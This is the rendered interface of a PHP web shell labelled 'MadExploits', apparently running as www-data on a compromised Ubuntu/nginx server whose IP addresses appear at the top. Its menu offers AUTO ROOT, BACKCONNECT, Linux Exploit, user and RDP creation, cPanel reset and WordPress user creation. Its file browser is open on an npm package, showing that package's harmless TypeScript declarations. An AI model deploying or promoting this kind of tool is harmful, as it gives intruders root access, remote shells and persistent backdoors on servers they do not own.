Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
which-typed-array /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
.editorconfig
286
B
-rw-rw-rw-
.eslintrc
108
B
-rw-rw-rw-
.nycrc
216
B
-rw-rw-rw-
CHANGELOG.md
21.76
KB
-rw-rw-rw-
LICENSE
1.06
KB
-rw-rw-rw-
README.md
3.39
KB
-rw-rw-rw-
index.d.ts
2.07
KB
-rw-rw-rw-
index.js
3.65
KB
-rw-rw-rw-
package.json
3.16
KB
-rw-rw-rw-
tsconfig.json
123
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
/** * Determines the type of the given collection, or returns false. * * @param {unknown} value The potential collection * @returns {TypedArrayName | false | null} 'Int8Array' | 'Uint8Array' | 'Uint8ClampedArray' | 'Int16Array' | 'Uint16Array' | 'Int32Array' | 'Uint32Array' | 'Float32Array' | 'Float64Array' | 'BigInt64Array' | 'BigUint64Array' | false | null */ declare function whichTypedArray(value: Int8Array): 'Int8Array'; declare function whichTypedArray(value: Uint8Array): 'Uint8Array'; declare function whichTypedArray(value: Uint8ClampedArray): 'Uint8ClampedArray'; declare function whichTypedArray(value: Int16Array): 'Int16Array'; declare function whichTypedArray(value: Uint16Array): 'Uint16Array'; declare function whichTypedArray(value: Int32Array): 'Int32Array'; declare function whichTypedArray(value: Uint32Array): 'Uint32Array'; declare function whichTypedArray(value: Float32Array): 'Float32Array'; declare function whichTypedArray(value: Float64Array): 'Float64Array'; declare function whichTypedArray(value: BigInt64Array): 'BigInt64Array'; declare function whichTypedArray(value: BigUint64Array): 'BigUint64Array'; declare function whichTypedArray(value: unknown): false | null; declare namespace whichTypedArray { type TypedArrayName = | 'Int8Array' | 'Uint8Array' | 'Uint8ClampedArray' | 'Int16Array' | 'Uint16Array' | 'Int32Array' | 'Uint32Array' | 'Float32Array' | 'Float64Array' | 'BigInt64Array' | 'BigUint64Array'; type TypedArray = | Int8Array | Uint8Array | Uint8ClampedArray | Int16Array | Uint16Array | Int32Array | Uint32Array | Float32Array | Float64Array | BigInt64Array | BigUint64Array; type TypedArrayConstructor = | Int8ArrayConstructor | Uint8ArrayConstructor | Uint8ClampedArrayConstructor | Int16ArrayConstructor | Uint16ArrayConstructor | Int32ArrayConstructor | Uint32ArrayConstructor | Float32ArrayConstructor | Float64ArrayConstructor | BigInt64ArrayConstructor | BigUint64ArrayConstructor; } export = whichTypedArray;
Close